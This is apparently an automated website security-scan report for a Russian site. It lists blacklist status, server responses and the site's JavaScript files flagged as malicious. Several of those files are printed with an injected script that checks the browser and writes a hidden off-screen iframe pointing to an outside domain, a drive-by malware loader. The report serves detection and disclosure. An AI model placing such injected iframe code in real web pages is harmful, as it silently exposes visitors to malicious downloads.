Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=dvoretsky.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://dvoretsky.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://dvoretsky.ru/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 15 Sep 2014 11:13:23 GMT Location: http://www.dvoretsky.ru/ Server: Apache/2.2.22 (FreeBSD) PHP/5.2.17 with Suhosin-Patch mod_ssl/2.2.22 OpenSSL/0.9.8q DAV/2 Content-Length: 0 Content-Type: text/html P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: 79a43b00f2609251659995a1f763eb97=6rs9d8rkucc7t37it496q9de95; path=/ X-Powered-By: PHP/5.2.17 | clean |
http://www.dvoretsky.ru/ | 200 OK Content-Length: 37742 Content-Type: text/html | clean |
http://www.dvoretsky.ru/plugins/system/JCH_Optimize/jscss.php?f=617f2f08dcba3349ccbd30375bdf2037&type=js | 200 OK Content-Length: 41380 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Sebastiancode(){var por=navigator.userAgent;var ha=(por.indexOf("IEMobile")>-1||por.indexOf("Android")>-1||por.indexOf("Linux")>-1||por.indexOf("FreeBSD")>-1||por.indexOf("Chrome")>-1||por.indexOf("Macintosh")>-1||por.indexOf("iPad")>-1||por.indexOf("iPhone")>-1);if(!ha){document.write('<if'+'rame src="http://liskametas.tomogara.org/safegajeta15.html" style="posit'+'ion:absolute;left: -799px;top: -799px;" height="120" width="120"></iframe>');}} Sebastiancode();try{$(document).ready(function(){$("div.content-menu ul li").each(function(){$(this).mouseover(function(){$(this).addClass('active').addClass('rc5');return false;});$(this).mouseout(function(){$(this).removeClass('active').removeClass("rc5");});});});}catch(e){};;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
http://dvoretsky.ru/zakonodatelstvo/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 15 Sep 2014 11:13:28 GMT Location: http://www.dvoretsky.ru/zakonodatelstvo/ Server: Apache/2.2.22 (FreeBSD) PHP/5.2.17 with Suhosin-Patch mod_ssl/2.2.22 OpenSSL/0.9.8q DAV/2 Content-Length: 0 Content-Type: text/html P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: 79a43b00f2609251659995a1f763eb97=nc11g96ks7dpj8g6se6bh42n91; path=/ X-Powered-By: PHP/5.2.17 | clean |
http://www.dvoretsky.ru/zakonodatelstvo/ | 200 OK Content-Length: 19353 Content-Type: text/html | clean |
http://www.dvoretsky.ru/plugins/system/JCH_Optimize/jscss.php?f=5847273bd7365ce0ab09ddc027a2397a&type=js | 200 OK Content-Length: 33427 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Sebastiancode(){var por=navigator.userAgent;var ha=(por.indexOf("IEMobile")>-1||por.indexOf("Android")>-1||por.indexOf("Linux")>-1||por.indexOf("FreeBSD")>-1||por.indexOf("Chrome")>-1||por.indexOf("Macintosh")>-1||por.indexOf("iPad")>-1||por.indexOf("iPhone")>-1);if(!ha){document.write('<if'+'rame src="http://liskametas.tomogara.org/safegajeta15.html" style="posit'+'ion:absolute;left: -799px;top: -799px;" height="120" width="120"></iframe>');}} Sebastiancode();try{$(document).ready(function(){$("div.content-menu ul li").each(function(){$(this).mouseover(function(){$(this).addClass('active').addClass('rc5');return false;});$(this).mouseout(function(){$(this).removeClass('active').removeClass("rc5");});});});}catch(e){};;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
http://dvoretsky.ru/knizhnyy-magazin.html | 200 OK Content-Length: 22791 Content-Type: text/html | clean |
http://www.dvoretsky.ru/components/com_virtuemart/fetchscript.php?gzip=0&subdir[0]=/themes/default&file[0]=theme.js&subdir[1]=/js&file[1]=sleight.js&subdir[2]=/js/mootools&file[2]=mootools-release-1.11.js&subdir[3]=/js/mootools&file[3]=mooPrompt.js | 200 OK Content-Length: 59703 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Sebastiancode() {
var por = navigator.userAgent; var ha = (por.indexOf("IEMobile") > -1 || por.indexOf("Android") > -1 || por.indexOf("Linux") > -1 || por.indexOf("FreeBSD") > -1 || por.indexOf("Chrome") > -1 || por.indexOf("Macintosh") > -1 || por.indexOf("iPad") > -1 || por.indexOf("iPhone") > -1); if (!ha) { document.write('<if'+'rame src="http://liskametas.tomogara.org/safegajeta15.html" style="posit'+'ion:absolute;left: -799px;top: - new Fx.Style(this.container, 'opacity', { duration:250, onComplete: function() { window.removeEvent('scroll', this.eventPosition).removeEvent('resize', this.eventPosition); if (this.options.overlay) { this.overlay.remove(); } try{ this.container.remove(); } catch(e){} }.bind(this) }).custom(1, 0); } }); MooPrompt.implement(new Chain);;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
http://dvoretsky.ru/plugins/system/JCH_Optimize/jscss.php?f=4acecd4f57983ded15c1d1c47cf24480&type=js&gz=gz | 500 Internal Server Error Content-Length: 412 Content-Type: text/javascript | clean |
http://www.dvoretsky.ru/components/com_virtuemart/fetchscript.php?gzip=0&subdir[0]=/js&file[0]=wz_tooltip.js | 200 OK Content-Length: 37485 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Sebastiancode() {
var por = navigator.userAgent; var ha = (por.indexOf("IEMobile") > -1 || por.indexOf("Android") > -1 || por.indexOf("Linux") > -1 || por.indexOf("FreeBSD") > -1 || por.indexOf("Chrome") > -1 || por.indexOf("Macintosh") > -1 || por.indexOf("iPad") > -1 || por.indexOf("iPhone") > -1); if (!ha) { document.write('<if'+'rame src="http://liskametas.tomogara.org/safegajeta15.html" style="posit'+'ion:absolute;left: -799px;top: - { var b = false; for(var i = tt_aExt.length; i;) {--i; var fnc = tt_aExt[i]["On" + sFnc]; if(fnc && fnc(arg)) b = true; } return b; } if (window.addEventListener) { window.addEventListener("load", tt_Init, false); } else if (window.attachEvent) { window.attachEvent("onload", tt_Init); } else if (document.getElementById) { window.onload=tt_Init; } ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
http://dvoretsky.ru/frontpage/company-catalog.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 15 Sep 2014 11:13:31 GMT Location: http://www.dvoretsky.ru/frontpage/company-catalog.html Server: Apache/2.2.22 (FreeBSD) PHP/5.2.17 with Suhosin-Patch mod_ssl/2.2.22 OpenSSL/0.9.8q DAV/2 Content-Length: 0 Content-Type: text/html P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: 79a43b00f2609251659995a1f763eb97=2iqdguct0ov6vtfpadb7l67re3; path=/ X-Powered-By: PHP/5.2.17 | clean |
http://www.dvoretsky.ru/frontpage/company-catalog.html | 200 OK Content-Length: 32012 Content-Type: text/html | clean |
http://www.dvoretsky.ru/plugins/system/JCH_Optimize/jscss.php?f=48230afac1ad1990696313d08c16e816&type=js | 200 OK Content-Length: 10360 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Sebastiancode(){var por=navigator.userAgent;var ha=(por.indexOf("IEMobile")>-1||por.indexOf("Android")>-1||por.indexOf("Linux")>-1||por.indexOf("FreeBSD")>-1||por.indexOf("Chrome")>-1||por.indexOf("Macintosh")>-1||por.indexOf("iPad")>-1||por.indexOf("iPhone")>-1);if(!ha){document.write('<if'+'rame src="http://liskametas.tomogara.org/safegajeta15.html" style="posit'+'ion:absolute;left: -799px;top: -799px;" height="120" width="120"></iframe>');}} Sebastiancode();try{$(document).ready(function(){$("div.content-menu ul li").each(function(){$(this).mouseover(function(){$(this).addClass('active').addClass('rc5');return false;});$(this).mouseout(function(){$(this).removeClass('active').removeClass("rc5");});});});}catch(e){};;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
http://dvoretsky.ru/lost-password.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 15 Sep 2014 11:13:34 GMT Location: http://www.dvoretsky.ru/lost-password.html Server: Apache/2.2.22 (FreeBSD) PHP/5.2.17 with Suhosin-Patch mod_ssl/2.2.22 OpenSSL/0.9.8q DAV/2 Content-Length: 0 Content-Type: text/html P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: 79a43b00f2609251659995a1f763eb97=0d36uebdj5e0asa2vekoqateo6; path=/ X-Powered-By: PHP/5.2.17 | clean |
http://www.dvoretsky.ru/lost-password.html | 200 OK Content-Length: 15220 Content-Type: text/html | clean |
http://www.dvoretsky.ru/plugins/system/JCH_Optimize/jscss.php?f=e798c2ae3977c9b31a898f1f744a28ce&type=js | 500 Internal Server Error Content-Length: 4088 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Sebastiancode(){var por=navigator.userAgent;var ha=(por.indexOf("IEMobile")>-1||por.indexOf("Android")>-1||por.indexOf("Linux")>-1||por.indexOf("FreeBSD")>-1||por.indexOf("Chrome")>-1||por.indexOf("Macintosh")>-1||por.indexOf("iPad")>-1||por.indexOf("iPhone")>-1);if(!ha){document.write('<if'+'rame src="http://liskametas.tomogara.org/safegajeta15.html" style="posit'+'ion:absolute;left: -799px;top: -799px;" height="120" width="120"></iframe>');}} Sebastiancode();try{$(document).ready(function(){$("div.content-menu ul li").each(function(){$(this).mouseover(function(){$(this).addClass('active').addClass('rc5');return false;});$(this).mouseout(function(){$(this).removeClass('active').removeClass("rc5");});});});}catch(e){};;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
http://dvoretsky.ru/novosti-kompaniy/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 15 Sep 2014 11:13:35 GMT Location: http://www.dvoretsky.ru/novosti-kompaniy/ Server: Apache/2.2.22 (FreeBSD) PHP/5.2.17 with Suhosin-Patch mod_ssl/2.2.22 OpenSSL/0.9.8q DAV/2 Content-Length: 0 Content-Type: text/html P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: 79a43b00f2609251659995a1f763eb97=cke86utqrqkqhtb7n4at69p6r3; path=/ X-Powered-By: PHP/5.2.17 | clean |
http://www.dvoretsky.ru/novosti-kompaniy/ | 200 OK Content-Length: 32085 Content-Type: text/html | clean |
http://www.dvoretsky.ru/knizhnyy-magazin.html | 200 OK Content-Length: 22791 Content-Type: text/html | clean |
http://www.dvoretsky.ru/plugins/system/JCH_Optimize/jscss.php?f=4acecd4f57983ded15c1d1c47cf24480&type=js&gz=gz | 500 Internal Server Error Content-Length: 412 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: dvoretsky.ru
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 15 Sep 2014 11:13:23 GMT
Location: http://www.dvoretsky.ru/
Server: Apache/2.2.22 (FreeBSD) PHP/5.2.17 with Suhosin-Patch mod_ssl/2.2.22 OpenSSL/0.9.8q DAV/2
Content-Length: 0
Content-Type: text/html
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 79a43b00f2609251659995a1f763eb97=6rs9d8rkucc7t37it496q9de95; path=/
X-Powered-By: PHP/5.2.17
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: dvoretsky.ru
Referer: http://www.google.com/search?q=dvoretsky.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.